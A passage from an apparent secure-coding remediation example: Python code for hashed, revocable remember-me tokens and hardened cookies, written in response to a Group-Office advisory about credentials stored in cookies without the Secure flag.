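# in-memory store and the 14-day lifetime are assumptions for illustration.
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Optional


class RememberMeStore:
    """Maps SHA-256(token) -> username.

    Only the hash is stored, so a copied table (or a backup) does not yield
    cookies an attacker could replay; the token itself exists only in the
    user's browser.
    """

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, username: str) -> str:
        # 256 bits from the OS CSPRNG; unguessable and unrelated to the password.
        token = secrets.token_urlsafe(32)
        self._tokens[self._digest(token)] = username
        return token

    def lookup(self, token: str) -> Optional[str]:
        # compare_digest keeps the comparison constant-time.
        digest = self._digest(token)
        for stored, user in self._tokens.items():
            if hmac.compare_digest(stored, digest):
                return user
        return None

    def revoke(self, token: str) -> bool:
        """Logout: invalidate the token server-side, not just in the browser."""
        return self._tokens.pop(self._digest(token), None) is not None


def remember_me_set_cookie(token: str, max_age: int = 14 * 24 * 3600) -> str:
    """Build the Set-Cookie header line for the token."""
    jar = SimpleCookie()
    jar["GO_REMEMBER"] = token
    morsel = jar["GO_REMEMBER"]
    morsel["secure"] = True     # never sent over plain HTTP
    morsel["httponly"] = True   # not readable from script, as Group-Office already did
    morsel["samesite"] = "Lax"
    morsel["max-age"] = max_age
    morsel["path"] = "/"
    return jar.output(header="Set-Cookie:")


def cookie_carries_credentials(set_cookie: str, username: str, password: str) -> bool:
    """The check that would have flagged the advisory's GO_UN/GO_PW cookies."""
    return username in set_cookie or password in set_cookie


if __name__ == "__main__":
    store = RememberMeStore()
    token = store.issue("alice")
    header = remember_me_set_cookie(token)
    print(header)
    print("resolves to:", store.lookup(token))
    print("leaks credentials:", cookie_carries_credentials(header, "alice", "hunter2"))
    store.revoke(token)
    print("after logout:", store.lookup(token))
```

Two details are worth keeping even when the token is random: the server stores a hash rather than the token, and logout revokes it, so a stolen cookie stops working as soon as the user logs out. The Secure flag is what the advisory says was missing; without it the token, like the original GO_PW cookie, travels over any HTTP request to the host.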